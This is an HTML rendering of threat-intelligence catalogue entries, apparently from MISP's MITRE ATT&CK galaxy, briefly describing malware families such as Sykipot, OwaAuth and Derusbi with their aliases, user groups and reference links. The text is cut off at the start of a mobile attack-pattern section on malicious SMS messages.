<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sykipot"><a class="anchor" href="#_sykipot"></a><a class="link" href="#_sykipot">Sykipot</a></h3>
<div class="paragraph">
<p>Sykipot is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of Sykipot hijacks smart cards on victims.[[Citation: Alienvault Sykipot DOD Smart Cards]] The group using this malware has also been referred to as Sykipot.[[Citation: Blasco 2013]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1319. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0018">https://attack.mitre.org/wiki/Software/S0018</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments">http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards">https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_glooxmail"><a class="anchor" href="#_glooxmail"></a><a class="link" href="#_glooxmail">GLOOXMAIL</a></h3>
<div class="paragraph">
<p>GLOOXMAIL is malware used by APT1 that mimics legitimate Jabber/XMPP traffic.[[Citation: Mandiant APT1]]</p>
</div>
<div class="paragraph">
<p>Aliases: GLOOXMAIL, Trojan.GTALK</p>
</div>
<div class="paragraph">
<p>GLOOXMAIL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GLOOXMAIL</p>
</li>
<li>
<p>Trojan.GTALK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1320. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0026">https://attack.mitre.org/wiki/Software/S0026</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_emissary"><a class="anchor" href="#_emissary"></a><a class="link" href="#_emissary">Emissary</a></h3>
<div class="paragraph">
<p>Emissary is a Trojan that has been used by Lotus Blossom. It shares code with Elise, with both Trojans being part of a malware group referred to as LStudio.[[Citation: Lotus Blossom Dec 2015]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1321. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0082">https://attack.mitre.org/wiki/Software/S0082</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/">http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_miner_c"><a class="anchor" href="#_miner_c"></a><a class="link" href="#_miner_c">Miner-C</a></h3>
<div class="paragraph">
<p>Miner-C is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread.[[Citation: Softpedia MinerC]]</p>
</div>
<div class="paragraph">
<p>Aliases: Miner-C, Mal/Miner-C, PhotoMiner</p>
</div>
<div class="paragraph">
<p>Miner-C is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Miner-C</p>
</li>
<li>
<p>Mal/Miner-C</p>
</li>
<li>
<p>PhotoMiner</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1322. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0133">https://attack.mitre.org/wiki/Software/S0133</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml">http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_komprogo"><a class="anchor" href="#_komprogo"></a><a class="link" href="#_komprogo">KOMPROGO</a></h3>
<div class="paragraph">
<p>KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management.[[Citation: FireEye APT32 May 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1323. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0156">https://attack.mitre.org/wiki/Software/S0156</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dustysky"><a class="anchor" href="#_dustysky"></a><a class="link" href="#_dustysky">DustySky</a></h3>
<div class="paragraph">
<p>DustySky is multi-stage malware written in .NET that has been used by Molerats since May 2015.[[Citation: DustySky]][[Citation: DustySky2]]</p>
</div>
<div class="paragraph">
<p>Aliases: DustySky, NeD Worm</p>
</div>
<div class="paragraph">
<p>DustySky is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DustySky</p>
</li>
<li>
<p>NeD Worm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1324. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0062">https://attack.mitre.org/wiki/Software/S0062</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2%20-6.2016%20TLP%20White.pdf">http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2%20-6.2016%20TLP%20White.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bubblewrap"><a class="anchor" href="#_bubblewrap"></a><a class="link" href="#_bubblewrap">BUBBLEWRAP</a></h3>
<div class="paragraph">
<p>BUBBLEWRAP is a full-featured, second-stage backdoor used by the admin@338 group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities.[[Citation: FireEye admin@338]]</p>
</div>
<div class="paragraph">
<p>Aliases: BUBBLEWRAP, Backdoor.APT.FakeWinHTTPHelper</p>
</div>
<div class="paragraph">
<p>BUBBLEWRAP is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BUBBLEWRAP</p>
</li>
<li>
<p>Backdoor.APT.FakeWinHTTPHelper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1325. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0043">https://attack.mitre.org/wiki/Software/S0043</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pngdowner"><a class="anchor" href="#_pngdowner"></a><a class="link" href="#_pngdowner">pngdowner</a></h3>
<div class="paragraph">
<p>pngdowner is malware used by Putter Panda. It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-
execute" utility.[[Citation: CrowdStrike Putter Panda]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1326. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0067">https://attack.mitre.org/wiki/Software/S0067</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sslmm"><a class="anchor" href="#_sslmm"></a><a class="link" href="#_sslmm">SslMM</a></h3>
<div class="paragraph">
<p>SslMM is a full-featured backdoor used by Naikon that has multiple variants.[[Citation: Baumgartner Naikon 2015]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1327. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0058">https://attack.mitre.org/wiki/Software/S0058</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nidiran"><a class="anchor" href="#_nidiran"></a><a class="link" href="#_nidiran">Nidiran</a></h3>
<div class="paragraph">
<p>Nidiran is a custom backdoor developed and used by Suckfly. It has been delivered via strategic web compromise.[[Citation: Symantec Suckfly March 2016]]</p>
</div>
<div class="paragraph">
<p>Aliases: Nidiran, Backdoor.Nidiran</p>
</div>
<div class="paragraph">
<p>Nidiran is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Nidiran</p>
</li>
<li>
<p>Backdoor.Nidiran</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1328. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0118">https://attack.mitre.org/wiki/Software/S0118</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates">http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_mebromi"><a class="anchor" href="#_trojan_mebromi"></a><a class="link" href="#_trojan_mebromi">Trojan.Mebromi</a></h3>
<div class="paragraph">
<p>Trojan.Mebromi is BIOS-level malware that takes control of the victim before MBR.[[Citation: Ge 2011]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1329. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0001">https://attack.mitre.org/wiki/Software/S0001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/bios-threat-showing-again">http://www.symantec.com/connect/blogs/bios-threat-showing-again</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_owaauth"><a class="anchor" href="#_owaauth"></a><a class="link" href="#_owaauth">OwaAuth</a></h3>
<div class="paragraph">
<p>OwaAuth is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by Threat Group-3390.[[Citation: Dell TG-3390]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1330. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0072">https://attack.mitre.org/wiki/Software/S0072</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rockboot"><a class="anchor" href="#_rockboot"></a><a class="link" href="#_rockboot">ROCKBOOT</a></h3>
<div class="paragraph">
<p>ROCKBOOT is a Bootkit that has been used by an unidentified, suspected China-based group.[[Citation: FireEye Bootkits]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1331. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0112">https://attack.mitre.org/wiki/Software/S0112</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html">https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_snugride"><a class="anchor" href="#_snugride"></a><a class="link" href="#_snugride">SNUGRIDE</a></h3>
<div class="paragraph">
<p>SNUGRIDE is a backdoor that has been used by menuPass as first stage malware.[[Citation: FireEye APT10 April 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1332. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0159">https://attack.mitre.org/wiki/Software/S0159</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_onionduke"><a class="anchor" href="#_onionduke"></a><a class="link" href="#_onionduke">OnionDuke</a></h3>
<div class="paragraph">
<p>OnionDuke is malware that was used by APT29 from 2013 to 2015.[[Citation: F-Secure The Dukes]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1333. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0052">https://attack.mitre.org/wiki/Software/S0052</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lowball"><a class="anchor" href="#_lowball"></a><a class="link" href="#_lowball">LOWBALL</a></h3>
<div class="paragraph">
<p>LOWBALL is malware used by admin@338. It was used in August 2015 in email messages targeting Hong Kong-based media organizations.[[Citation: FireEye admin@338]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1334. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0042">https://attack.mitre.org/wiki/Software/S0042</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackcoffee"><a class="anchor" href="#_blackcoffee"></a><a class="link" href="#_blackcoffee">BLACKCOFFEE</a></h3>
<div class="paragraph">
<p>BLACKCOFFEE is malware that has been used by APT17 since at least 2013.[[Citation: FireEye APT17]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1335. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0069">https://attack.mitre.org/wiki/Software/S0069</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf">https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_derusbi"><a class="anchor" href="#_derusbi"></a><a class="link" href="#_derusbi">Derusbi</a></h3>
<div class="paragraph">
<p>Derusbi is malware used by multiple Chinese APT groups.[[Citation: Axiom]][[Citation: ThreatConnect Anthem]] Both Windows and Linux variants have been observed.[[Citation: Fidelis Turbo]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1336. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0021">https://attack.mitre.org/wiki/Software/S0021</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/TA%20Fidelis%20Turbo%201602%200.pdf">https://www.fidelissecurity.com/sites/default/files/TA%20Fidelis%20Turbo%201602%200.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf">http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/">https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_epic"><a class="anchor" href="#_epic"></a><a class="link" href="#_epic">Epic</a></h3>
<div class="paragraph">
<p>Epic is a backdoor that has been used by Turla.[[Citation: Kaspersky Turla]]</p>
</div>
<div class="paragraph">
<p>Aliases: Epic, Tavdig, Wipbot, WorldCupSec, TadjMakhal</p>
</div>
<div class="paragraph">
<p>Epic is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Epic</p>
</li>
<li>
<p>Tavdig</p>
</li>
<li>
<p>Wipbot</p>
</li>
<li>
<p>WorldCupSec</p>
</li>
<li>
<p>TadjMakhal</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1337. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0091">https://attack.mitre.org/wiki/Software/S0091</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/65545/the-epic-turla-operation/">https://securelist.com/analysis/publications/65545/the-epic-turla-operation/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lurid"><a class="anchor" href="#_lurid"></a><a class="link" href="#_lurid">Lurid</a></h3>
<div class="paragraph">
<p>Lurid is a malware family that has been used by several groups, including PittyTiger, in targeted attacks as far back as 2006.[[Citation: Villeneuve 2014]][[Citation: Villeneuve 2011]]</p>
</div>
<div class="paragraph">
<p>Aliases: Lurid, Enfal</p>
</div>
<div class="paragraph">
<p>Lurid is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lurid</p>
</li>
<li>
<p>Enfal</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1338. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0010">https://attack.mitre.org/wiki/Software/S0010</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html">https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20dissecting-lurid-apt.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20dissecting-lurid-apt.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_3para_rat"><a class="anchor" href="#_3para_rat"></a><a class="link" href="#_3para_rat">3PARA RAT</a></h3>
<div class="paragraph">
<p>3PARA RAT is a remote access tool (RAT) programmed in C++ that has been used by Putter Panda.[[Citation: CrowdStrike Putter Panda]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1339. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0066">https://attack.mitre.org/wiki/Software/S0066</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jhuhugit"><a class="anchor" href="#_jhuhugit"></a><a class="link" href="#_jhuhugit">JHUHUGIT</a></h3>
<div class="paragraph">
<p>JHUHUGIT is malware used by APT28. It is based on Carberp source code and serves as reconnaissance malware.[[Citation: Kaspersky Sofacy]][[Citation: F-Secure Sofacy 2015]][[Citation: ESET Sednit Part 1]][[Citation: FireEye APT28 January 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: JHUHUGIT, Seduploader, JKEYSKW, Sednit, GAMEFISH</p>
</div>
<div class="paragraph">
<p>JHUHUGIT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>JHUHUGIT</p>
</li>
<li>
<p>Seduploader</p>
</li>
<li>
<p>JKEYSKW</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>GAMEFISH</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1340. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0044">https://attack.mitre.org/wiki/Software/S0044</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/">https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/">https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_elmer"><a class="anchor" href="#_elmer"></a><a class="link" href="#_elmer">ELMER</a></h3>
<div class="paragraph">
<p>ELMER is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by APT16.[[Citation: FireEye EPS Awakens Part 2]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1341. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0064">https://attack.mitre.org/wiki/Software/S0064</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_mobile_attack_attack_pattern"><a class="anchor" href="#_mobile_attack_attack_pattern"></a><a class="link" href="#_mobile_attack_attack_pattern">Mobile Attack - Attack Pattern</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>ATT&amp;CK tactic.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Mobile Attack - Attack Pattern is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile</a> attack - attack pattern.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_malicious_sms_message_mob_t1057"><a class="anchor" href="#_malicious_sms_message_mob_t1057"></a><a class="link" href="#_malicious_sms_message_mob_t1057">Malicious SMS Message - MOB-T1057</a></h3>
<div class="paragraph">
<p>An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device. For example, Mulliner and Miller demonstrated such an attack against the iPhone in 2009 as described in (Citation: Forbes-iPhoneSMS).</p>
</div>
<div class="paragraph">
<p>An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser.</p>
</div>
<div class="paragraph">
<p>As described by SRLabs in (Citation: SRLabs-SIMCard), vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
